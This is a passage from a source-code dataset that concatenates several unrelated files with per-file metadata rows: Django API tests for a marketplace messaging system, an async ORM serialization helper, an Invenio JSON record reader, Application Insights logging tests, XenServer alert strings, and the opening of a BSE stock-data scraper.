    def test_addon_dev_allowed(self):
        thread = self._thread_factory(perms=['developer'])
        self.addon.addonuser_set.create(user=self.profile)
        assert self.check_permissions(thread)
    def test_addon_dev_denied(self):
        """Test when the user is a developer of a different add-on."""
        thread = self._thread_factory(perms=['developer'])
        self.profile.addonuser_set.create(addon=addon_factory())
        assert not self.check_permissions(thread)
    def test_read_public(self):
        thread = self._thread_factory(perms=['public'])
        assert self.check_permissions(thread)
    def test_read_moz_contact(self):
        thread = self._thread_factory(perms=['mozilla_contact'])
        self.addon.update(mozilla_contact=self.profile.email)
        assert self.check_permissions(thread)
    def test_read_reviewer(self):
        thread = self._thread_factory(perms=['reviewer'])
        self.grant_permission(self.profile, 'Apps:Review')
        assert self.check_permissions(thread)
    def test_read_senior_reviewer(self):
        thread = self._thread_factory(perms=['senior_reviewer'])
        self.grant_permission(self.profile, 'Apps:ReviewEscalated')
        assert self.check_permissions(thread)
    def test_read_staff(self):
        thread = self._thread_factory(perms=['staff'])
        self.grant_permission(self.profile, 'Admin:%')
        assert self.check_permissions(thread)
    def test_cors_allowed(self):
        thread = self._thread_factory()
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        self.assertCORS(res, 'get', 'post', 'patch')
    def test_mark_read(self):
        # PATCHing is_read marks every note in the thread read.
        thread = self._thread_factory()
        note1 = self._note_factory(thread)
        note2 = self._note_factory(thread)
        res = self.client.patch(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
            data=json.dumps({'is_read': True}))
        eq_(res.status_code, 204)
        assert note1.read_by_users.filter(user=self.profile).exists()
        assert note2.read_by_users.filter(user=self.profile).exists()
    def test_review_url(self):
        thread = self._thread_factory(note=True)
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(res.status_code, 200)
        eq_(res.json['addon_meta']['review_url'],
            reverse('reviewers.apps.review', args=[self.addon.app_slug]))
    def test_version_number(self):
        # The version number survives deletion of the version object.
        version = version_factory(addon=self.addon, version='7.12')
        thread = CommunicationThread.objects.create(
            addon=self.addon, version=version, read_permission_public=True)
        res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
        eq_(json.loads(res.content)['version_number'], '7.12')
        eq_(json.loads(res.content)['version_is_obsolete'], False)
        version.delete()
        res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
        eq_(json.loads(res.content)['version_number'], '7.12')
        eq_(json.loads(res.content)['version_is_obsolete'], True)
    def test_app_threads(self):
        # app_threads lists all the app's threads, newest version first.
        version1 = version_factory(addon=self.addon, version='7.12')
        thread1 = CommunicationThread.objects.create(
            addon=self.addon, version=version1, read_permission_public=True)
        version2 = version_factory(addon=self.addon, version='1.16')
        thread2 = CommunicationThread.objects.create(
            addon=self.addon, version=version2, read_permission_public=True)
        for thread in (thread1, thread2):
            res = self.client.get(reverse('comm-thread-detail',
                                          args=[thread.pk]))
            eq_(res.status_code, 200)
            eq_(json.loads(res.content)['app_threads'],
                [{"id": thread2.id, "version__version": version2.version},
                 {"id": thread1.id, "version__version": version1.version}])
class TestThreadList(RestOAuth, CommTestMixin):
    """Tests for the comm-thread-list endpoint (listing, filters, create)."""
    fixtures = fixture('webapp_337141', 'user_2519')
    def setUp(self):
        super(TestThreadList, self).setUp()
        self.create_switch('comm-dashboard')
        self.addon = Webapp.objects.get(pk=337141)
        self.list_url = reverse('comm-thread-list')
    def test_response(self):
        """Test the list response, we don't want public threads in the list."""
        self._thread_factory(note=True, perms=['public'])
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
    def test_addon_filter(self):
        self._thread_factory(note=True)
        res = self.client.get(self.list_url, {'app': '337141'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        # This add-on doesn't exist.
        res = self.client.get(self.list_url, {'app': '1000'})
        eq_(res.status_code, 404)
    def test_app_slug(self):
        # The app can also be filtered by slug rather than pk.
        thread = CommunicationThread.objects.create(addon=self.addon)
        CommunicationNote.objects.create(author=self.profile, thread=thread,
                                         note_type=0, body='something')
        res = self.client.get(self.list_url, {'app': self.addon.app_slug})
        eq_(res.status_code, 200)
        eq_(res.json['objects'][0]['addon_meta']['app_slug'],
            self.addon.app_slug)
    def test_app_threads(self):
        version1 = version_factory(addon=self.addon, version='7.12')
        thread1 = CommunicationThread.objects.create(
            addon=self.addon, version=version1, read_permission_public=True)
        CommunicationThreadCC.objects.create(user=self.profile, thread=thread1)
        version2 = version_factory(addon=self.addon, version='1.16')
        thread2 = CommunicationThread.objects.create(
            addon=self.addon, version=version2, read_permission_public=True)
        CommunicationThreadCC.objects.create(user=self.profile, thread=thread2)
        res = self.client.get(self.list_url, {'app': self.addon.app_slug})
        eq_(res.json['app_threads'],
            [{"id": thread2.id, "version__version": version2.version},
             {"id": thread1.id, "version__version": version1.version}])
    def test_create(self):
        # POSTing to the list creates a thread (plus note) for the app.
        self.create_switch('comm-dashboard')
        version_factory(addon=self.addon, version='1.1')
        data = {
            'app': self.addon.app_slug,
            'version': '1.1',
            'note_type': '0',
            'body': 'flylikebee'
        }
        self.addon.addonuser_set.create(user=self.user.get_profile())
        res = self.client.post(self.list_url, data=json.dumps(data))
        eq_(res.status_code, 201)
        assert self.addon.threads.count()
class NoteSetupMixin(RestOAuth, CommTestMixin, AttachmentManagementMixin):
    """Shared setup: a developer-readable thread plus note/thread URLs."""
    fixtures = fixture('webapp_337141', 'user_2519', 'user_999',
                       'user_support_staff')
    def setUp(self):
        super(NoteSetupMixin, self).setUp()
        self.create_switch('comm-dashboard')
        self.addon = Webapp.objects.get(pk=337141)
        self.thread = self._thread_factory(
            perms=['developer'], version=self.addon.current_version)
        self.thread_url = reverse(
            'comm-thread-detail', kwargs={'pk': self.thread.id})
        self.list_url = reverse(
            'comm-note-list', kwargs={'thread_id': self.thread.id})
        # Make the test profile a developer of the app.
        self.profile.addonuser_set.create(addon=self.addon)
class TestNote(NoteSetupMixin):
    """Tests for note detail/list/replies endpoints and read tracking."""
    @override_settings(REVIEWER_ATTACHMENTS_PATH=TESTS_DIR)
    def test_response(self):
        note = self._note_factory(self.thread)
        attach = note.attachments.create(filepath='test_api.py',
                                         description='desc')
        res = self.client.get(reverse(
            'comm-note-detail',
            kwargs={'thread_id': self.thread.id, 'pk': note.id}))
        eq_(res.status_code, 200)
        eq_(res.json['body'], 'something')
        eq_(res.json['reply_to'], None)
        eq_(res.json['is_read'], False)
        # Read.
        note.mark_read(self.profile)
        res = self.client.get(reverse('comm-note-detail',
                                      kwargs={'thread_id': self.thread.id,
                                              'pk': note.id}))
        eq_(res.json['is_read'], True)
        # Attachments.
        eq_(len(res.json['attachments']), 1)
        eq_(res.json['attachments'][0]['url'],
            settings.SITE_URL +
            reverse('reviewers.apps.review.attachment', args=[attach.id]))
        eq_(res.json['attachments'][0]['display_name'], 'desc')
        ok_(not res.json['attachments'][0]['is_image'])
    def test_show_read_filter(self):
        """Test `is_read` filter."""
        note = self._note_factory(self.thread)
        note.mark_read(self.profile)
        # Test with `show_read=true`.
        res = self.client.get(self.list_url, {'show_read': 'truey'})
        eq_(res.json['objects'][0]['is_read'], True)
        # Test with `show_read=false`.
        note.reads_set.all().delete()
        res = self.client.get(self.list_url, {'show_read': '0'})
        eq_(res.json['objects'][0]['is_read'], False)
    def test_read_perms(self):
        # A developer only sees developer-readable notes.
        staff = UserProfile.objects.get(username='support_staff')
        self._note_factory(
            self.thread, perms=['developer'], author=staff, body='oncetoldme')
        no_dev_note = self._note_factory(
            self.thread, no_perms=['developer'], author=staff)
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        eq_(res.json['objects'][0]['body'], 'oncetoldme')
        # Test that the author always has permissions.
        no_dev_note.update(author=self.profile)
        res = self.client.get(self.list_url)
        eq_(len(res.json['objects']), 2)
    def test_create(self):
        res = self.client.post(self.list_url, data=json.dumps(
            {'note_type': '0', 'body': 'something'}))
        eq_(res.status_code, 201)
        eq_(res.json['body'], 'something')
    def test_create_perm(self):
        # Without developer read permission the POST is forbidden.
        self.thread.update(read_permission_developer=False)
        res = self.client.post(self.list_url, data=json.dumps(
            {'note_type': '0', 'body': 'something'}))
        eq_(res.status_code, 403)
    def test_cors_allowed(self):
        res = self.client.get(self.list_url)
        self.assertCORS(res, 'get', 'post', 'patch')
    def test_reply_list(self):
        note = self._note_factory(self.thread)
        note.replies.create(thread=self.thread, author=self.profile)
        res = self.client.get(reverse('comm-note-replies-list',
                                      kwargs={'thread_id': self.thread.id,
                                              'note_id': note.id}))
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        eq_(res.json['objects'][0]['reply_to'], note.id)
    def test_reply_create(self):
        note = self._note_factory(self.thread)
        res = self.client.post(
            reverse('comm-note-replies-list',
                    kwargs={'thread_id': self.thread.id, 'note_id': note.id}),
            data=json.dumps({'note_type': '0',
                             'body': 'something'}))
        eq_(res.status_code, 201)
        eq_(note.replies.count(), 1)
    def test_note_emails(self):
        # Creating a reply notifies the other app authors by email.
        self.create_switch(name='comm-dashboard')
        note = self._note_factory(self.thread, perms=['developer'])
        res = self.client.post(
            reverse('comm-note-replies-list',
                    kwargs={'thread_id': self.thread.id,
                            'note_id': note.id}),
            data=json.dumps({'note_type': '0',
                             'body': 'something'}))
        eq_(res.status_code, 201)
        # Decrement authors.count() by 1 because the author of the note is
        # one of the authors of the addon.
        eq_(len(mail.outbox), self.thread.addon.authors.count() - 1)
    def test_mark_read(self):
        note = self._note_factory(self.thread)
        note.mark_read(self.profile)
        res = self.client.patch(
            reverse('comm-note-detail',
                    kwargs={'thread_id': self.thread.id,
                            'pk': note.id}),
            data=json.dumps({'is_read': True}))
        eq_(res.status_code, 204)
        assert note.read_by_users.filter(user=self.profile).exists()
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestAttachment(NoteSetupMixin):
    """Tests for posting attachments to a note (limits, ownership, CORS)."""
    def setUp(self):
        super(TestAttachment, self).setUp()
        self.note = self._note_factory(self.thread, author=self.profile)
        self.attachment_url = reverse(
            'comm-attachment-list', kwargs={'thread_id': self.thread.id,
                                            'note_id': self.note.id})
    def test_cors_bad_request(self):
        res = self.client.post(self.attachment_url, data={},
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 400)
        self.assertCORS(res, 'post')
    def _save_attachment_mock(self, storage, attachment, filepath):
        # Stand-in for mkt.comm.utils._save_attachment: just echo a name.
        if 'jpg' in filepath:
            return 'bacon.jpg'
        return 'bacon.txt'
    @mock.patch('mkt.comm.utils._save_attachment')
    def test_create_attachment(self, _mock):
        _mock.side_effect = self._save_attachment_mock
        data = self._attachments(num=2)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 201)
        eq_(CommAttachment.objects.count(), 2)
        attach1 = CommAttachment.objects.all()[0]
        eq_(attach1.note, self.note)
        eq_(attach1.filepath, 'bacon.txt')
        eq_(attach1.description, '')
        assert not attach1.is_image()
        attach2 = CommAttachment.objects.all()[1]
        eq_(attach2.note, self.note)
        eq_(attach2.filepath, 'bacon.jpg')
        eq_(attach2.description, 'mmm, bacon')
        assert attach2.is_image()
    @mock.patch.object(mkt.constants.comm, 'MAX_ATTACH', 1)
    def test_max_attach(self):
        # Posting more attachments than MAX_ATTACH is rejected.
        data = self._attachments(num=2)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 400)
    def test_not_note_owner(self):
        # Only the note's author may attach files to it.
        self.note.update(author=user_factory())
        data = self._attachments(num=2)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 403)
@mock.patch.object(settings, 'WHITELISTED_CLIENTS_EMAIL_API',
                   ['10.10.10.10'])
@mock.patch.object(settings, 'POSTFIX_AUTH_TOKEN', 'something')
class TestEmailApi(RestOAuth):
    """Tests for the Postfix email intake endpoint and its permission."""

    def get_request(self, data=None):
        """Build a POST request that satisfies EmailCreationPermission."""
        request = req_factory_factory(reverse('post-email-api'), self.profile)
        request.method = 'POST'
        request.META['REMOTE_ADDR'] = '10.10.10.10'
        request.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'something'
        request.POST = dict(data) if data else {}
        return request

    def test_allowed(self):
        # Whitelisted IP plus correct token => permission granted.
        granted = EmailCreationPermission().has_permission(self.get_request(),
                                                           None)
        assert granted

    def test_ip_denied(self):
        request = self.get_request()
        request.META['REMOTE_ADDR'] = '10.10.10.1'
        assert not EmailCreationPermission().has_permission(request, None)

    def test_token_denied(self):
        request = self.get_request()
        request.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'somethingwrong'
        assert not EmailCreationPermission().has_permission(request, None)

    @mock.patch('mkt.comm.tasks.consume_email.apply_async')
    def test_successful(self, consume_mock):
        request = self.get_request({'body': 'something'})
        response = post_email(request)
        consume_mock.assert_called_with(('something',))
        eq_(response.status_code, 201)

    def test_bad_request(self):
        """Test with no email body."""
        response = post_email(self.get_request())
        eq_(response.status_code, 400)
| bsd-3-clause | 7,681,959,617,094,682,000 | 37.50738 | 79 | 0.593503 | false | 3.722975 | true | false | false |
Python-Tools/aioorm | aioorm/shortcuts.py | 1 | 3656 | from asyncio import iscoroutine
from peewee import ForeignKeyField
from playhouse.shortcuts import _clone_set
async def model_to_dict(model, recurse=True, backrefs=False, only=None,
                        exclude=None, seen=None, extra_attrs=None,
                        fields_from_query=None, max_depth=None):
    """
    Convert a model instance (and any related objects) to a dictionary.

    :param bool recurse: Whether foreign-keys should be recursed.
    :param bool backrefs: Whether lists of related objects should be recursed.
    :param only: A list (or set) of field instances indicating which fields
        should be included.
    :param exclude: A list (or set) of field instances that should be
        excluded from the dictionary.
    :param seen: Internal set of already-visited fields (cycle protection).
    :param list extra_attrs: Names of model instance attributes or methods
        that should be included.
    :param SelectQuery fields_from_query: Query that was source of model. Take
        fields explicitly selected by the query and serialize them.
    :param int max_depth: Maximum depth to recurse, value <= 0 means no max.
    :return: plain dict representation of ``model``.
    """
    # Bug fix: the module header imports only ForeignKeyField, so the
    # fields_from_query branch below raised NameError on Field/Node.
    from peewee import Field, Node

    max_depth = -1 if max_depth is None else max_depth
    if max_depth == 0:
        recurse = False

    only = _clone_set(only)
    extra_attrs = _clone_set(extra_attrs)

    if fields_from_query is not None:
        # Serialize exactly what the query selected: real columns go into
        # `only`, aliased expressions are exposed via `extra_attrs`.
        for item in fields_from_query._select:
            if isinstance(item, Field):
                only.add(item)
            elif isinstance(item, Node) and item._alias:
                extra_attrs.add(item._alias)

    data = {}
    exclude = _clone_set(exclude)
    seen = _clone_set(seen)
    exclude |= seen  # never revisit fields already on the recursion path
    model_class = type(model)

    for field in model._meta.declared_fields:
        if field in exclude or (only and (field not in only)):
            continue
        field_data = model._data.get(field.name)
        if isinstance(field, ForeignKeyField) and recurse:
            if field_data:
                seen.add(field)
                rel_obj = getattr(model, field.name)
                # Async accessors may hand back a coroutine; resolve it
                # before recursing into the related object.
                if iscoroutine(rel_obj):
                    rel_obj = await rel_obj
                field_data = await model_to_dict(
                    rel_obj,
                    recurse=recurse,
                    backrefs=backrefs,
                    only=only,
                    exclude=exclude,
                    seen=seen,
                    max_depth=max_depth - 1)
            else:
                field_data = None
        data[field.name] = field_data

    if extra_attrs:
        for attr_name in extra_attrs:
            attr = getattr(model, attr_name)
            # Methods are called; plain attributes are taken as-is.
            if callable(attr):
                data[attr_name] = attr()
            else:
                data[attr_name] = attr

    if backrefs and recurse:
        for related_name, foreign_key in model._meta.reverse_rel.items():
            descriptor = getattr(model_class, related_name)
            if descriptor in exclude or foreign_key in exclude:
                continue
            if only and (descriptor not in only) and (foreign_key not in only):
                continue
            accum = []
            exclude.add(foreign_key)
            # Prefer the prefetched result set when one is available.
            related_query = getattr(
                model,
                related_name + '_prefetch',
                getattr(model, related_name))
            async for rel_obj in related_query:
                accum.append(await model_to_dict(
                    rel_obj,
                    recurse=recurse,
                    backrefs=backrefs,
                    only=only,
                    exclude=exclude,
                    max_depth=max_depth - 1))
            data[related_name] = accum

    return data
| mpl-2.0 | 7,883,790,944,815,843,000 | 35.19802 | 79 | 0.560449 | false | 4.474908 | false | false | false |
chokribr/invenioold | modules/bibfield/lib/bibfield_jsonreader.py | 15 | 3259 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
import re
from invenio.bibfield_reader import Reader
class JsonReader(Reader):
    """Default reader for records whose master format is already JSON."""
    __master_format__ = 'json'

    def __init__(self, blob, **kwargs):
        """
        :param blob: dict-like record content to be read in.
        """
        super(JsonReader, self).__init__(blob=blob, **kwargs)
        self._additional_info['master_format'] = 'json'

    @staticmethod
    def split_blob(blob, schema=None, **kwargs):
        """
        In case of several records inside the blob this method specifies how
        to split them and work one by one afterwards.
        """
        return blob.splitlines()

    def _prepare_blob(self, *args, **kwargs):
        # The blob is already JSON-shaped: merge it straight into self.json.
        self.json.update(self.blob)

    def _get_elements_from_blob(self, regex_key):
        # 'entire_record' / '*' are wildcard keys meaning "the whole blob".
        if regex_key in ('entire_record', '*'):
            return self.blob
        return [self.blob.get(key) for key in regex_key]

    def _apply_rules(self, json_id, field_name, rule_def):
        """Apply a creator rule; returns True on success, False on error."""
        try:
            info = self._find_meta_metadata(json_id, field_name, 'creator', {'source_tag':json_id}, rule_def)
            # 'json_ext' carries custom (de)serialization hooks for the field.
            if 'json_ext' in rule_def and field_name in self.json:
                self.json[field_name] = rule_def['json_ext']['dumps'](self.json[field_name])
            self.json['__meta_metadata__.%s' % (field_name, )] = info
        except KeyError:
            # Field not present in the blob: fall back to its default value.
            self._set_default_value(json_id, field_name)
        except Exception, e:
            self.json['__meta_metadata__']['__errors__']\
                .append('Rule Error - Unable to apply rule for field %s - %s' % (field_name, str(e)),)
            return False
        return True

    def _apply_virtual_rules(self, json_id, field_name, rule_def):
        # Returns False on error, the superclass result when the field is
        # absent, and (implicitly) None on success in the present-field path.
        if field_name in self.json:
            try:
                # NOTE(review): rule_type and rule are not defined anywhere in
                # this scope -- this branch raises NameError at runtime, which
                # the except below swallows and logs as a continuable error.
                # Likely a porting bug; confirm the intended variables.
                info = self._find_meta_metadata(json_id, field_name, rule_type, rule, rule_def)
                if rule_type == 'derived' or rule['memoize']:
                    if 'json_ext' in rule_def:
                        self.json[field_name] = rule_def['json_ext']['dumps'](self.json[field_name])
                else:
                    self.json[field_name] = None
            except Exception, e:
                self.json['__meta_metadata__']['__continuable_errors__']\
                    .append('Virtual Rule CError - Unable to evaluate %s - %s' % (field_name, str(e)))
                return False
        else:
            return super(JsonReader, self)._apply_virtual_rules(json_id, field_name, rule_def)

# Module-level alias used by the reader registry.
reader = JsonReader
| gpl-2.0 | -6,291,421,180,600,111,000 | 38.743902 | 109 | 0.596809 | false | 3.856805 | false | false | false |
Microsoft/ApplicationInsights-Python | tests/applicationinsights_tests/logging_tests/TestLoggingHandler.py | 1 | 7185 | import unittest
import logging as pylogging
import sys, os, os.path
from applicationinsights.channel import AsynchronousQueue, AsynchronousSender
from applicationinsights.channel import SynchronousQueue, SynchronousSender
rootDirectory = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
if rootDirectory not in sys.path:
sys.path.append(rootDirectory)
from applicationinsights import logging
from applicationinsights.logging.LoggingHandler import enabled_instrumentation_keys
class TestEnable(unittest.TestCase):
    """Tests for logging.enable(): handler creation and registration."""

    def test_enable(self):
        # Default enable: synchronous queue and sender.
        handler1 = logging.enable('foo')
        self.assertIsNotNone(handler1)
        self.assertEqual('LoggingHandler', handler1.__class__.__name__)
        self.assertEqual('foo', handler1.client.context.instrumentation_key)
        self.assertIsInstance(handler1.client.channel.queue, SynchronousQueue)
        self.assertIsInstance(handler1.client.channel.sender, SynchronousSender)
        # Enabling the same key twice yields another handler for that key.
        handler2 = logging.enable('foo')
        self.assertEqual('LoggingHandler', handler2.__class__.__name__)
        self.assertEqual('foo', handler2.client.context.instrumentation_key)
        # A custom telemetry channel is passed through to the client.
        channel = MockChannel()
        handler3 = logging.enable('bar', telemetry_channel=channel)
        # NOTE(review): this re-checks handler1; it was presumably meant to
        # assert on the freshly created handler3 -- confirm and fix.
        self.assertIsNotNone(handler1)
        self.assertEqual('LoggingHandler', handler3.__class__.__name__)
        self.assertEqual('bar', handler3.client.context.instrumentation_key)
        self.assertEqual(channel, handler3.client.channel)
        # The handlers are attached to the root logger; detach to clean up.
        all_handlers = pylogging.getLogger().handlers
        self.assertIn(handler2, all_handlers)
        self.assertIn(handler3, all_handlers)
        pylogging.getLogger().removeHandler(handler2)
        pylogging.getLogger().removeHandler(handler3)

    def test_enable_with_endpoint(self):
        handler = logging.enable('foo', endpoint='http://bar')
        self.assertEqual(handler.client.channel.sender.service_endpoint_uri, 'http://bar')
        pylogging.getLogger().removeHandler(handler)

    def test_enable_with_async(self):
        # async_=True switches to the asynchronous queue/sender pair.
        handler = logging.enable('foo', async_=True)
        self.assertIsInstance(handler.client.channel.queue, AsynchronousQueue)
        self.assertIsInstance(handler.client.channel.sender, AsynchronousSender)
        pylogging.getLogger().removeHandler(handler)

    def test_enable_raises_exception_on_async_with_telemetry_channel(self):
        # async_ and telemetry_channel are mutually exclusive.
        with self.assertRaises(Exception):
            logging.enable('foo', async_=True, telemetry_channel=MockChannel())

    def test_enable_raises_exception_on_endpoint_with_telemetry_channel(self):
        # endpoint and telemetry_channel are mutually exclusive.
        with self.assertRaises(Exception):
            logging.enable('foo', endpoint='http://bar', telemetry_channel=MockChannel())

    def test_enable_with_level(self):
        handler = logging.enable('foo', level='DEBUG')
        self.assertIsNotNone(handler)
        self.assertEqual(handler.level, pylogging.DEBUG)
        pylogging.getLogger().removeHandler(handler)

    def test_enable_raises_exception_on_no_instrumentation_key(self):
        self.assertRaises(Exception, logging.enable, None)

    def test_handler_removal_clears_cache(self):
        # Removing the handler must drop its key from the module-level
        # enabled_instrumentation_keys cache.
        def enable_telemetry():
            logging.enable('key1')
        def remove_telemetry_handlers():
            for handler in pylogging.getLogger().handlers:
                if isinstance(handler, logging.LoggingHandler):
                    pylogging.getLogger().removeHandler(handler)
        enable_telemetry()
        self.assertIn('key1', enabled_instrumentation_keys)
        remove_telemetry_handlers()
        self.assertNotIn('key1', enabled_instrumentation_keys)
class TestLoggingHandler(unittest.TestCase):
    """Tests for LoggingHandler: construction and telemetry emission."""

    def test_construct(self):
        handler = logging.LoggingHandler('test')
        self.assertIsNotNone(handler)
        self.assertEqual('test', handler.client.context.instrumentation_key)

    def test_construct_raises_exception_on_no_instrumentation_key(self):
        self.assertRaises(Exception, logging.LoggingHandler, None)

    def test_log_works_as_expected(self):
        logger, sender, channel = self._setup_logger()
        # (log call, message, envelope type, ikey, base type,
        #  expected severity level, formatted message)
        # NOTE(review): logger.warn is the deprecated alias of
        # logger.warning -- kept here byte-identical.
        expected = [
            (logger.debug, 'debug message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 0, 'simple_logger - DEBUG - debug message'),
            (logger.info, 'info message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 1, 'simple_logger - INFO - info message'),
            (logger.warn, 'warn message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 2, 'simple_logger - WARNING - warn message'),
            (logger.error, 'error message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 3, 'simple_logger - ERROR - error message'),
            (logger.critical, 'critical message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 4, 'simple_logger - CRITICAL - critical message')
        ]
        for logging_function, logging_parameter, envelope_type, ikey, data_type, severity_level, message in expected:
            logging_function(logging_parameter)
            # The mock sender collects batches; each batch holds one envelope.
            data = sender.data[0][0]
            sender.data = []
            self.assertEqual(envelope_type, data.name)
            self.assertEqual(ikey, data.ikey)
            self.assertEqual(data_type, data.data.base_type)
            self.assertEqual(message, data.data.base_data.message)
            self.assertEqual(severity_level, data.data.base_data.severity_level)
        # Context properties and the operation id flow into the envelope.
        channel.context.properties['foo'] = 'bar'
        channel.context.operation.id = 1001
        logger.info('info message')
        data = sender.data[0][0]
        self.assertEqual('bar', data.data.base_data.properties['foo'])
        self.assertEqual(1001, data.tags.get('ai.operation.id'))

    def test_log_exception_works_as_expected(self):
        logger, sender, _ = self._setup_logger()
        try:
            raise Exception('blah')
        except:
            logger.exception('some error')
        data = sender.data[0][0]
        self.assertEqual('Microsoft.ApplicationInsights.Exception', data.name)
        self.assertEqual('test', data.ikey)
        self.assertEqual('ExceptionData', data.data.base_type)
        self.assertEqual('blah', data.data.base_data.exceptions[0].message)

    def _setup_logger(self):
        """Wire a DEBUG logger to a LoggingHandler whose channel sends
        through a mock sender; returns (logger, sender, channel)."""
        logger = pylogging.getLogger('simple_logger')
        logger.setLevel(pylogging.DEBUG)
        handler = logging.LoggingHandler('test')
        handler.setLevel(pylogging.DEBUG)
        channel = handler.client.channel
        # mock out the sender
        sender = MockSynchronousSender()
        queue = channel.queue
        # max_queue_length of 1 forces a flush after every log record.
        queue.max_queue_length = 1
        queue._sender = sender
        sender.queue = queue
        formatter = pylogging.Formatter('%(name)s - %(levelname)s - %(message)s')
        handler.setFormatter(formatter)
        logger.addHandler(handler)
        return logger, sender, channel
class MockChannel:
    """Telemetry-channel test double whose flush() does nothing."""

    def flush(self):
        return None
class MockSynchronousSender:
    """Sender test double: records every batch handed to send()."""

    def __init__(self):
        self.queue = None
        self.send_buffer_size = 1
        self.data = []

    def send(self, data_to_send):
        # Capture the batch so tests can inspect what was "sent".
        self.data.append(data_to_send)
| mit | 3,186,689,510,377,948,000 | 41.767857 | 163 | 0.675157 | false | 4.14121 | true | false | false |
ches/openxenmanager | messages.py | 2 | 2098 | messages = {}
messages_header = {}
messages_header['PBD_PLUG_FAILED_ON_SERVER_START'] = "Failed to attach storage on server boot"
messages['PBD_PLUG_FAILED_ON_SERVER_START'] = "\
A storage repository could not be attached when server '%s' started.\n \
You may be able to fix this using the 'Repair Storage'\n \
option in the Storage menu."
messages_header['HOST_SYNC_DATA_FAILED'] = "XenServer statistics synchronization failed"
messages['HOST_SYNC_DATA_FAILED'] = "\
%s. There was a temporary failure synchronizing performance statistics across the\n \
pool, probably because one or more servers were offline. Another\n \
synchronization attempt will be made later."
messages_header['host_alert_fs_usage'] = "File System On %s Full"
messages['host_alert_fs_usage'] = "\
Disk usage for the %s on server '%s' has reached %0.2f%%. XenServer's\n \
performance will be critically affected if this disk becomes full.\n \
Log files or other non-essential (user created) files should be removed."
messages_header['alert_cpu_usage'] = "CPU Usage Alarm"
messages['alert_cpu_usage'] = "\
CPU usage on VM '%s' has been on average %0.2f%% for the last %d seconds.\n\
This alarm is set to be triggered when CPU usage is more than %0.1f%%"
messages_header['VM_SHUTDOWN'] = "VM shutdown"
messages['VM_SHUTDOWN'] = "\
VM '%s' has shut down."
messages_header['VM_STARTED'] = "VM started"
messages['VM_STARTED'] = "\
VM '%s' has started."
messages_header['VM_REBOOTED'] = "VM rebooted"
messages['VM_REBOOTED'] = "\
VM '%s' has rebooted."
messages_header['VM_SUSPENDED'] = "VM suspended"
messages['VM_SUSPENDED'] = "\
VM '%s' has suspended."
messages_header['VM_RESUMEND'] = "VM resumed"
messages['VM_RESUMED'] = "\
VM '%s' has resumed."
messages_header['restartHost'] = "After applying this update, all servers must be restarted."
messages_header['restartHVM'] = "After applying this update, all Linux VMs must be restarted."
messages_header['restartPV'] = "After applying this update, all Windows VMs must be restarted."
messages_header['restartXAPI'] = "After applying this update, all VMs must be restarted."
| gpl-2.0 | -5,009,017,996,744,451,000 | 47.790698 | 95 | 0.725929 | false | 3.405844 | false | false | false |
gabhijit/equities-data-utils | get_stocks_bse.py | 2 | 3579 | #
# Refer to LICENSE file and README file for licensing information.
#
# A simple script that tries to download the historical stock data
# for a BSE scrip
import os
from datetime import datetime as dt
import requests
import bs4
from tickerplot.utils.logger import get_logger
# Module-level logger named after this script's file name.
module_logger = get_logger(os.path.basename(__file__))

# Earliest date for which historical data is requested (dd/mm/yyyy).
GLOBAL_START_DATE = '01/01/2002'
# Date format used by the BSE historical-prices web form.
DATE_FORMAT = '%d/%m/%Y'
# Date format used when composing output file names.
DATE_FMT_FNAME = "%Y%m%d"
def get_data_for_security(script_code, sdate, edate=None):
    """Download historical data for a BSE scrip between two dd/mm/yyyy
    dates; ``edate`` defaults to today when omitted."""
    start = dt.strptime(sdate, '%d/%m/%Y')
    if edate is None:
        end = dt.today()
    else:
        end = dt.strptime(edate, '%d/%m/%Y')
    _do_get_data_for_security(script_code, start, end)
def _do_get_data_for_security(script_code, sdate, edate):
    """Scrape historical prices for ``script_code`` from the BSE website
    between ``sdate`` and ``edate`` (datetime objects) and save the
    downloaded CSV to the current directory.
    """
    sdate = dt.strftime(sdate, DATE_FORMAT)
    edate = dt.strftime(edate, DATE_FORMAT)
    url = 'http://www.bseindia.com/markets/equity/EQReports/'\
            'StockPrcHistori.aspx?expandable=7&flag=0'
    module_logger.info("GET: %s", url)
    # First GET the page to harvest the ASP.NET hidden form fields
    # (__VIEWSTATE etc.) that must be echoed back in the POST.
    x = requests.get(url)
    html = bs4.BeautifulSoup(x.text, 'html.parser')
